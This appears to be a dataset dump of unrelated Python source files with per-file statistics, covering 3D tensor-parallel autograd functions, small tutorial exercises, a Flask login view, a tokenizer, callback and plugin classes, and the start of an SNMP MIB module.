src_rank = ranks_in_group[gpc.get_local_rank(output_parallel_mode)]
bias_temp = bias.clone()
dist.broadcast(bias_temp,
src=src_rank,
group=gpc.get_group(input_parallel_mode))
# [h/q]
bias_temp = all_gather(bias_temp, -1, weight_parallel_mode)
out = input_ + bias_temp
ctx.depth = depth
ctx.src_rank = src_rank
ctx.A_group_parallel_mode = input_parallel_mode
ctx.B_group_parallel_mode = weight_parallel_mode
ctx.C_group_parallel_mode = output_parallel_mode
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
# output_grad: [m/q^2, n, h/q]
with torch.no_grad():
# [h/q]
grad = torch.sum(output_grad,
dim=tuple(range(len(output_grad.shape))[:-1]))
bias_grad = reduce_scatter(grad, -1, ctx.B_group_parallel_mode)
dist.reduce(bias_grad,
dst=ctx.src_rank,
group=gpc.get_group(ctx.A_group_parallel_mode))
if gpc.get_local_rank(
ctx.A_group_parallel_mode) != gpc.get_local_rank(
ctx.C_group_parallel_mode):
bias_grad = None
return output_grad, bias_grad, None, None, None, None
class Mul_3D(torch.autograd.Function):
"""Matrix multiplication for :math:`C = A * b`
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any, input_: Tensor, bias: Tensor, depth: int,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode) -> Tensor:
# input: [m/q^2, n, h/q]
# bias: [h/q^2]
ranks_in_group = gpc.get_ranks_in_group(input_parallel_mode)
src_rank = ranks_in_group[gpc.get_local_rank(output_parallel_mode)]
# [h/q^2]
bias_temp = bias.clone()
dist.broadcast(bias_temp,
src=src_rank,
group=gpc.get_group(input_parallel_mode))
# [h/q]
bias_temp = all_gather(bias_temp, -1, weight_parallel_mode)
# empty_cache()
ctx.save_for_backward(input_, bias_temp)
out = torch.mul(input_, bias_temp)
ctx.depth = depth
ctx.src_rank = src_rank
ctx.A_group_parallel_mode = input_parallel_mode
ctx.B_group_parallel_mode = weight_parallel_mode
ctx.C_group_parallel_mode = output_parallel_mode
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
# output_grad: [m/q^2, n, h/q]
with torch.no_grad():
input_, bias = ctx.saved_tensors
# [m/q^2, n, h/q]
input_grad = torch.mul(output_grad, bias)
# [h/q]
grad = torch.mul(output_grad, input_)
grad = torch.sum(grad,
dim=tuple(range(len(output_grad.shape))[:-1]))
bias_grad = reduce_scatter(grad, -1, ctx.B_group_parallel_mode)
dist.reduce(bias_grad,
dst=ctx.src_rank,
group=gpc.get_group(ctx.A_group_parallel_mode))
if gpc.get_local_rank(
ctx.A_group_parallel_mode) != gpc.get_local_rank(
ctx.C_group_parallel_mode):
bias_grad = None
return input_grad, bias_grad, None, None, None, None
class Sum_3D(torch.autograd.Function):
"""Compute the sum of input tensors
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any,
input_: Tensor,
dim: int,
depth: int,
parallel_mode: ParallelMode,
keepdim: bool = False) -> Tensor:
# input: [m/q^2, n, h/q]
out = torch.sum(input_, dim=dim, keepdim=keepdim)
dist.all_reduce(out, group=gpc.get_group(parallel_mode))
ctx.input_shape = input_.shape
ctx.depth = depth
ctx.group = parallel_mode
ctx.dim = dim
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
with torch.no_grad():
output_grad = output_grad.contiguous()
dist.all_reduce(output_grad, group=gpc.get_group(ctx.group))
if len(output_grad.shape) < len(ctx.input_shape):
output_grad = torch.unsqueeze(output_grad, ctx.dim)
dims = [1 for _ in range(len(output_grad.shape))]
dims[ctx.dim] = ctx.input_shape[ctx.dim]
input_grad = output_grad.repeat(tuple(dims))
return input_grad, None, None, None, None, None
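`Sum_3D` collapses a dimension in forward, so in backward the incoming gradient is broadcast back along that dimension (the `repeat` over `dims`). A minimal torch-free sketch of that rule on nested lists, with the cross-rank `all_reduce` omitted:

```python
def sum_dim0(x):
    """Forward: sum a nested-list 'tensor' over dim 0."""
    return [sum(col) for col in zip(*x)]

def sum_dim0_backward(grad, n_rows):
    # d(sum)/dx_ij = 1, so every input row receives a copy of the output
    # gradient -- what the repeat(tuple(dims)) call above does per dimension.
    return [list(grad) for _ in range(n_rows)]

x = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]]
g = [0.5, -1.0]
assert sum_dim0(x) == [9.0, 12.0]
assert sum_dim0_backward(g, len(x)) == [[0.5, -1.0]] * 3
```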
class Reduce_3D(torch.autograd.Function):
"""Reduce input tensors
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any, input_: Tensor, depth: int,
parallel_mode: ParallelMode) -> Tensor:
dist.all_reduce(input_, group=gpc.get_group(parallel_mode))
return input_.clone()
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
return output_grad, None, None
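The `Matmul_*_3D` functions above share one pattern: all-gather the operand shards, run a local matmul, then reduce-scatter the partial products. A single-process sketch with two simulated ranks and the contraction dimension sharded (plain lists instead of tensors; `matmul` and `elementwise_add` are our stand-ins, not ColossalAI API) shows why the reduction step is needed:

```python
def matmul(a, b):
    # Naive dense matmul on nested lists.
    return [[sum(x * y for x, y in zip(row, col)) for col in zip(*b)] for row in a]

def elementwise_add(a, b):
    return [[x + y for x, y in zip(ra, rb)] for ra, rb in zip(a, b)]

A = [[1.0, 2.0, 3.0, 4.0],
     [5.0, 6.0, 7.0, 8.0]]
B = [[1.0, 0.0],
     [0.0, 1.0],
     [2.0, 1.0],
     [1.0, 2.0]]

# Each simulated "rank" holds a slice of A's columns and the matching slice
# of B's rows (the contraction dimension k is sharded).
A_shards = [[row[:2] for row in A], [row[2:] for row in A]]
B_shards = [B[:2], B[2:]]

# Local matmuls only cover each rank's slice of k ...
partials = [matmul(A_shards[r], B_shards[r]) for r in range(2)]
# ... so an all-reduce (here an explicit sum) is needed for the full product,
full = elementwise_add(partials[0], partials[1])
assert full == matmul(A, B)
# and reduce-scatter = all-reduce followed by a split along the output dim:
rank_outputs = [full[:1], full[1:]]
```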
| 40.824468 | 105 | 0.568903 | 2,796 | 23,025 | 4.375894 | 0.055794 | 0.152023 | 0.061136 | 0.027462 | 0.782101 | 0.728239 | 0.700776 | 0.662852 | 0.619207 | 0.597793 | 0 | 0.009042 | 0.332378 | 23,025 | 563 | 106 | 40.89698 | 0.786885 | 0.203735 | 0 | 0.637143 | 0 | 0 | 0.003685 | 0 | 0 | 0 | 0 | 0 | 0.005714 | 1 | 0.051429 | false | 0 | 0.022857 | 0.002857 | 0.151429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f82c12ed8951d265d131d91c77eea61d5c672a59 | 187 | py | Python | Cursoemvideo/Desafios/Desafio 29.py | Guilherme-Lanna/Python | fc5b677300f9829eb3ef58c288a083e398ada3fa | [
"MIT"
] | null | null | null | Cursoemvideo/Desafios/Desafio 29.py | Guilherme-Lanna/Python | fc5b677300f9829eb3ef58c288a083e398ada3fa | [
"MIT"
] | null | null | null | Cursoemvideo/Desafios/Desafio 29.py | Guilherme-Lanna/Python | fc5b677300f9829eb3ef58c288a083e398ada3fa | [
"MIT"
] | null | null | null | v = int(input('Velocidade do carro ao passar no radar = '))
m = v-80
if v > 80:
print('O carro estava acima da velocidade permitida')
print('A multa irá custar R${}'.format(m*7))
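The fine calculation can also be factored into a testable function. A small sketch — the function name and the `limit`/`rate` parameters are ours, not part of the exercise, which fixes them at 80 km/h and R$7 per km over:

```python
def fine_for_speed(v, limit=80, rate=7):
    """Fine in R$ when v km/h exceeds the limit; 0 otherwise."""
    over = v - limit
    return over * rate if over > 0 else 0

assert fine_for_speed(100) == 140  # 20 km/h over * R$7
assert fine_for_speed(80) == 0     # exactly at the limit: no fine
```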
| 31.166667 | 59 | 0.652406 | 33 | 187 | 3.69697 | 0.787879 | 0.04918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033557 | 0.203209 | 187 | 5 | 60 | 37.4 | 0.785235 | 0 | 0 | 0 | 0 | 0 | 0.57754 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.2 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
f83a0b0faefa02aa919355b762075d9c15fc1587 | 590 | py | Python | chapter_3/ex_3-10.py | akshaymoharir/PythonCrashCourse | 742b9841cff61d36567e8706efc69c5f5d5435ff | [
"MIT"
] | null | null | null | chapter_3/ex_3-10.py | akshaymoharir/PythonCrashCourse | 742b9841cff61d36567e8706efc69c5f5d5435ff | [
"MIT"
] | null | null | null | chapter_3/ex_3-10.py | akshaymoharir/PythonCrashCourse | 742b9841cff61d36567e8706efc69c5f5d5435ff | [
"MIT"
] | null | null | null |
## Python Crash Course
# Exercise 3.10: Every Function:
# Think of something you could store in a list.
# For example, you could make a list of mountains, rivers, countries, cities, languages, or any- thing else you’d like.
# Write a program that creates a list containing these items and then uses each function introduced in this chapter at least once .
def main():
print("Skipping this exercise since this is redundant exercise to use previously used functions again.")
if __name__ == '__main__':
main()
| 32.777778 | 148 | 0.657627 | 80 | 590 | 4.75 | 0.7875 | 0.039474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007092 | 0.283051 | 590 | 17 | 149 | 34.705882 | 0.891253 | 0.666102 | 0 | 0 | 0 | 0 | 0.553763 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f843b7049cf0fac0b50d40a3b92837a09a8e3362 | 896 | py | Python | application/auth/views.py | villeheikkila/herkkupankki | 5848fbf29197c110d3bddedd1e439834ac8ea988 | [
"MIT"
] | null | null | null | application/auth/views.py | villeheikkila/herkkupankki | 5848fbf29197c110d3bddedd1e439834ac8ea988 | [
"MIT"
] | 2 | 2018-11-27T22:40:51.000Z | 2018-12-15T13:51:35.000Z | application/auth/views.py | villeheikkila/herkkupankki | 5848fbf29197c110d3bddedd1e439834ac8ea988 | [
"MIT"
] | null | null | null | from flask import render_template, request, redirect, url_for
from flask_login import login_user, logout_user
from application import app
from application.auth.models import User
from application.auth.forms import LoginForm
@app.route("/auth/login", methods = ["GET", "POST"])
def auth_login():
if request.method == "GET":
return render_template("auth/loginform.html", form = LoginForm())
form = LoginForm(request.form)
# mahdolliset validoinnit
user = User.query.filter_by(username=form.username.data, password=form.password.data).first()
if not user:
return render_template("auth/loginform.html", form = form,
error = "No such username or password")
login_user(user)
return redirect(url_for("index"))
@app.route("/auth/logout")
def auth_logout():
logout_user()
return redirect(url_for("index")) | 33.185185 | 97 | 0.690848 | 114 | 896 | 5.307018 | 0.377193 | 0.069421 | 0.069421 | 0.079339 | 0.231405 | 0.231405 | 0.135537 | 0 | 0 | 0 | 0 | 0 | 0.19308 | 896 | 27 | 98 | 33.185185 | 0.836791 | 0.02567 | 0 | 0.1 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.1 | 0.25 | 0 | 0.55 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
f8462801593ecea070691b29edbb3c4767e94112 | 233 | py | Python | mudrex/about.py | surajiyer/mudrex | 341c02b3e7148f5238324f51a36a964ea8076322 | [
"MIT"
] | 1 | 2021-09-07T08:03:51.000Z | 2021-09-07T08:03:51.000Z | mudrex/about.py | surajiyer/mudrex | 341c02b3e7148f5238324f51a36a964ea8076322 | [
"MIT"
] | null | null | null | mudrex/about.py | surajiyer/mudrex | 341c02b3e7148f5238324f51a36a964ea8076322 | [
"MIT"
] | null | null | null | __title__ = 'mudrex'
__version__ = '0.1.2'
__summary__ = 'Send external webhook signals to Mudrex platform.'
__uri__ = 'https://github.com/surajiyer/mudrex'
__author__ = 'Suraj Iyer'
__email__ = 'me@surajiyer.com'
__license__ = 'MIT' | 33.285714 | 65 | 0.746781 | 29 | 233 | 5.034483 | 0.862069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014563 | 0.11588 | 233 | 7 | 66 | 33.285714 | 0.694175 | 0 | 0 | 0 | 0 | 0 | 0.529915 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f85998730f5834af63ac4c2799d1d60a4a6d530d | 2,653 | py | Python | fclsp/laplacian_coef.py | idc9/fclsp | 8e379c88386580df9ab2574e01240a43bd5fa51c | [
"MIT"
] | null | null | null | fclsp/laplacian_coef.py | idc9/fclsp | 8e379c88386580df9ab2574e01240a43bd5fa51c | [
"MIT"
] | null | null | null | fclsp/laplacian_coef.py | idc9/fclsp | 8e379c88386580df9ab2574e01240a43bd5fa51c | [
"MIT"
] | null | null | null | import numpy as np
from scipy.sparse import diags
from sklearn.metrics import pairwise_distances
from fclsp.reshaping_utils import vec_hollow_sym
def get_lap_coef(V, w, var_type, shape):
"""
Computes the Laplacian coefficent vector
TODO: finish documenting
Parameters
----------
V: array-like
w: array-like
var_type: str
Type of the variable. Must be one of ['hollow_sym', 'rect', 'multi'].
shape: tuple of ints
Shape of the variable.
Output
------
    lap_coef: array-like
        The Laplacian coefficient vector.
"""
assert var_type in ['hollow_sym', 'rect', 'multi']
if var_type == 'hollow_sym':
return get_lap_coef_hollow_sym(V=V, w=w)
elif var_type == 'rect':
return get_lap_coef_rect(V=V, w=w, shape=shape)
elif var_type == 'multi':
return get_lap_coef_multi(V=V, w=w, shape=shape)
def get_lap_coef_hollow_sym(V, w):
"""
    Returns the Laplacian coefficient for an adjacency matrix.
    Let A(x) in R^{d x d} be an adjacency matrix parametrized by its edges x in R^{d choose 2}. Also let V in R^{d times K} and w in R^K for K <= d.
The laplacian coefficient M(V, w) in R^{d choose 2} is the vector such that
M(V, w)^T x = Tr(V^T Laplacian(A(x)) V diag(w))
Parameters
----------
V: array-like, (n_nodes, K)
The input matrix.
w: array-like, (K, )
The input vector.
Output
-------
M(V, w): array-like, (n_nodes choose 2, )
The Laplacian coefficient vector.
"""
assert V.shape[1] == len(w)
coef = pairwise_distances(V @ diags(np.sqrt(w)), metric='euclidean',
n_jobs=None) # TODO: give option
coef = vec_hollow_sym(coef) ** 2
return coef
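The pairwise-distance trick in `get_lap_coef_hollow_sym` rests on the identity Tr(V^T L(A(x)) V diag(w)) = sum over edges x_ij * sum_k w_k (V_ik - V_jk)^2. A pure-Python check of the K = 1 case (no numpy; the upper-triangle edge ordering is assumed to match `vec_hollow_sym`):

```python
d = 4
v = [0.5, -1.0, 2.0, 0.0]          # single column of V (K = 1)
w = 0.7                            # single weight
edges = [(i, j) for i in range(d) for j in range(i + 1, d)]  # assumed vec order
x = [0.3, 1.1, 0.0, 0.5, 2.0, 0.25]  # one edge weight per (i, j) pair

# Build the dense graph Laplacian L = D - A from the edge weights ...
A = [[0.0] * d for _ in range(d)]
for k, (i, j) in enumerate(edges):
    A[i][j] = A[j][i] = x[k]
deg = [sum(row) for row in A]
L = [[(deg[i] if i == j else 0.0) - A[i][j] for j in range(d)] for i in range(d)]

# ... and evaluate the weighted quadratic form w * v^T L v directly,
quad_form = w * sum(v[i] * L[i][j] * v[j] for i in range(d) for j in range(d))

# which equals the dot product of x with the squared-distance coefficients.
coef = [w * (v[i] - v[j]) ** 2 for (i, j) in edges]
dot = sum(c * xk for c, xk in zip(coef, x))
assert abs(quad_form - dot) < 1e-9
```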
def get_lap_coef_rect(V, w, shape):
"""
    Returns the Laplacian coefficient for a rectangular matrix.
Parameters
----------
V: array-like, (n_nodes, K)
The input matrix.
w: array-like, (K, )
The input vector.
shape: tuple of two ints
        Size of the rectangular matrix.
Output
-------
M(V, w): array-like, (sum(shape), )
The Laplacian coefficient vector.
"""
raise NotImplementedError
def get_lap_coef_multi(V, w, shape):
"""
    Returns the Laplacian coefficient for a multi-array.
Parameters
----------
V: array-like, (n_nodes, K)
The input matrix.
w: array-like, (K, )
The input vector.
    shape: tuple of ints
        Shape of the multi-array.
Output
-------
M(V, w): array-like
The Laplacian coefficient vector.
"""
raise NotImplementedError
| 21.92562 | 149 | 0.598191 | 385 | 2,653 | 4.007792 | 0.264935 | 0.015554 | 0.045366 | 0.033701 | 0.466623 | 0.394038 | 0.269605 | 0.269605 | 0.269605 | 0.217758 | 0 | 0.002619 | 0.280437 | 2,653 | 120 | 150 | 22.108333 | 0.805657 | 0.562759 | 0 | 0.090909 | 0 | 0 | 0.052106 | 0 | 0 | 0 | 0 | 0.016667 | 0.090909 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f862ac415f828e0a22935f07ae2502ead0cdf448 | 786 | py | Python | src/server/server_callbacks.py | DuckBoss/AtleastOne-Server | 86be389d4918558f65baa4127a823d14ff4e2ed2 | [
"MIT"
] | null | null | null | src/server/server_callbacks.py | DuckBoss/AtleastOne-Server | 86be389d4918558f65baa4127a823d14ff4e2ed2 | [
"MIT"
] | 6 | 2020-04-27T03:20:39.000Z | 2020-06-20T03:49:08.000Z | src/server/server_callbacks.py | DuckBoss/AtleastOne-Server | 86be389d4918558f65baa4127a823d14ff4e2ed2 | [
"MIT"
] | null | null | null | from threading import Thread
class ServerCallbacks(dict):
def __init__(self):
super().__init__()
self.update({
'on_client_connect': None,
'on_client_disconnect': None,
'on_server_start': None,
})
def register_callback(self, callback, dest):
self[callback] = dest
def remove_callback(self, callback):
try:
del self[callback]
return True
except KeyError:
return False
def get_callback(self, callback):
try:
self[callback]
except KeyError:
return None
def callback(self, callback, *params):
if self[callback]:
thr = Thread(target=self[callback], args=params)
thr.start()
| 23.818182 | 60 | 0.559796 | 79 | 786 | 5.35443 | 0.455696 | 0.255319 | 0.189125 | 0.108747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.348601 | 786 | 32 | 61 | 24.5625 | 0.826172 | 0 | 0 | 0.153846 | 0 | 0 | 0.066158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.038462 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f869391639d52fb0f0b3b3152e31b178d13ecb7d | 333 | py | Python | bunruija/tokenizers/space_tokenizer.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | 4 | 2020-12-22T11:12:35.000Z | 2021-12-15T13:30:02.000Z | bunruija/tokenizers/space_tokenizer.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | 4 | 2021-01-16T07:34:22.000Z | 2021-08-14T06:56:07.000Z | bunruija/tokenizers/space_tokenizer.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | null | null | null | from bunruija.tokenizers import BaseTokenizer
class SpaceTokenizer(BaseTokenizer):
def __init__(self, **kwargs):
super().__init__(name='space')
def __call__(self, text):
result = text.split(' ')
return result
def __repr__(self):
out = f'{self.__class__.__name__}()'
return out
| 22.2 | 45 | 0.633634 | 35 | 333 | 5.342857 | 0.628571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246246 | 333 | 14 | 46 | 23.785714 | 0.74502 | 0 | 0 | 0 | 0 | 0 | 0.099099 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.1 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f869bdaba494df9c8da46be22e6af9b8a2ccfb84 | 59 | py | Python | python_aulas/aula014_while.py | gilsonaureliano/Python-aulas | 64269872acd482bcf297941ba28d30f13f29c752 | [
"MIT"
] | 1 | 2021-08-05T13:52:12.000Z | 2021-08-05T13:52:12.000Z | python_aulas/aula014_while.py | gilsonaureliano/Python-aulas | 64269872acd482bcf297941ba28d30f13f29c752 | [
"MIT"
] | null | null | null | python_aulas/aula014_while.py | gilsonaureliano/Python-aulas | 64269872acd482bcf297941ba28d30f13f29c752 | [
"MIT"
] | null | null | null | c = 0
while c < 10:
print(c)
c = c + 1
print('FIM') | 11.8 | 13 | 0.457627 | 12 | 59 | 2.25 | 0.583333 | 0.148148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 0.355932 | 59 | 5 | 14 | 11.8 | 0.605263 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
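The lesson file above counts 0 through 9 with a manual `while` counter. The idiomatic Python equivalent uses `range`; a short sketch:

```python
# Equivalent of the while-loop lesson using range()
for c in range(10):
    print(c)
print('FIM')  # "END" in Portuguese, as in the original lesson
```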
f869d690dda6dacf2f93199e09d167ef6faf33a5 | 983 | py | Python | supplement/03_property.py | kaixiang1992/python-learning | c74aa4bec0c72e26cf18f138e6faf110ed64d8c0 | [
"MIT"
] | null | null | null | supplement/03_property.py | kaixiang1992/python-learning | c74aa4bec0c72e26cf18f138e6faf110ed64d8c0 | [
"MIT"
] | 7 | 2020-06-05T23:24:41.000Z | 2021-06-10T19:02:09.000Z | supplement/03_property.py | kaixiang1992/python-learning | c74aa4bec0c72e26cf18f138e6faf110ed64d8c0 | [
"MIT"
] | null | null | null | '''
@description 【Python知识补充】get和set方法 2019/10/05 14:48
'''
class Plane(object):
def __init__(self):
# TODO: 存活状态
self.alive = True
# TODO: 累计积分
self.score = 0
# TODO: 更改存活状态
def set_alive(self, value):
self.alive = value
if value == False:
self.die_action()
# TODO: 获取存活状态
def get_alive(self):
if not self.alive:
self.cancel_schedule()
return self.alive
# TODO: 设置累计积分
def set_score(self, value):
self.score = value
self._update_score_ranking(value)
# TODO: 更新积分排行榜
def _update_score_ranking(self, value):
print('更新积分排行榜:%d'%(value, ))
# TODO: 执行飞机死亡动画
def die_action(self):
print('执行飞机死亡动画!...')
# TODO: 取消事件调度
def cancel_schedule(self):
print('取消事件调度!...')
plane = Plane()
# TODO: 击中状态
hit = True
if hit:
plane.set_alive(False)
plane.set_score(150)
plane.get_alive() | 20.914894 | 51 | 0.568667 | 118 | 983 | 4.567797 | 0.381356 | 0.06679 | 0.048237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023564 | 0.309257 | 983 | 47 | 52 | 20.914894 | 0.77025 | 0.168871 | 0 | 0 | 0 | 0 | 0.0399 | 0 | 0 | 0 | 0 | 0.021277 | 0 | 1 | 0.259259 | false | 0 | 0 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
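The explicit `set_`/`get_` methods above are one way to attach side effects to attribute access; Python's `property` protocol expresses the same pattern with plain attribute syntax. A minimal sketch (only the `alive` attribute is shown, and `die_action` is simplified):

```python
class Plane:
    """Sketch of the get/set pattern above using Python's property protocol."""

    def __init__(self):
        self._alive = True

    @property
    def alive(self):
        return self._alive

    @alive.setter
    def alive(self, value):
        self._alive = value
        if not value:
            self.die_action()

    def die_action(self):
        print('Playing the plane death animation!...')


p = Plane()
p.alive = False  # the setter runs die_action() as a side effect
```

Reads and writes look like ordinary attribute access, but the hooks still run, which is why `property` is usually preferred over explicit getter/setter methods in Python.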
f87de822683a7c83c2711cdc3627d3677019f42c | 1,627 | py | Python | ragpicker/reporting/mysql.py | K4lium/Snakepit | c11f3fb7f78b886dad09421bc84a97ee14b9bf0b | [
"MIT"
] | 7 | 2016-09-09T08:09:24.000Z | 2018-03-28T11:51:56.000Z | ragpicker/reporting/mysql.py | Kalium/Snakepit | c11f3fb7f78b886dad09421bc84a97ee14b9bf0b | [
"MIT"
] | 2 | 2016-11-13T01:43:29.000Z | 2017-08-16T07:51:51.000Z | ragpicker/reporting/mysql.py | K4lium/Snakepit | c11f3fb7f78b886dad09421bc84a97ee14b9bf0b | [
"MIT"
] | 8 | 2016-09-09T08:09:37.000Z | 2018-08-15T20:58:14.000Z | # Copyright (C) 2013-2015 Ragpicker Developers.
# This file is part of Ragpicker Malware Crawler - http://code.google.com/p/malware-crawler/
from yapsy.IPlugin import IPlugin
from core.abstracts import Report
class MySQL(IPlugin, Report):
"""Stores data from long-run analysis in MySQL."""
    def run(self, results, objfile):
        """Writes report.
        @param results: analysis results dictionary.
        @param objfile: file object
        """
        # The import must be done here; otherwise configurations without MySQL raise an error
        from core.databaseMysql import DatabaseMySQL
        database = DatabaseMySQL()
        print "mysql.py method Run"
"""
# Count query using URL hash and file hash
count = database.countRagpickerDB(results["Info"]["file"]["md5"], results["Info"]["url"]["md5"])
# If report available for the file and url -> not insert
if count == 0:
# Create a copy of the dictionary. This is done in order to not modify
# the original dictionary and possibly compromise the following
# reporting modules.
report = dict(results)
# Store the report
database.insertRagpickerDB(report)
"""
def deleteAll(self):
"""Deletes all reports.
"""
        print "mysql.py method DeleteAll"
"""
        # Delete all Ragpicker data from MongoDB
count = Database().deleteRagpickerDB()
print "*** MongoDB (Ragpicker)***"
print "deleted documents:" + str(count)
print ""
""" | 36.155556 | 104 | 0.606638 | 179 | 1,627 | 5.513966 | 0.575419 | 0.028369 | 0.024316 | 0.038501 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009632 | 0.298095 | 1,627 | 45 | 105 | 36.155556 | 0.854641 | 0.13276 | 0 | 0 | 0 | 0 | 0.116162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
f87fbecb1aa5df093ef07d9095b3cbbfa22b5190 | 59,284 | py | Python | pysnmp-with-texts/NSCRTV-ROOT.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/NSCRTV-ROOT.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/NSCRTV-ROOT.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module NSCRTV-ROOT (http://snmplabs.com/pysmi)
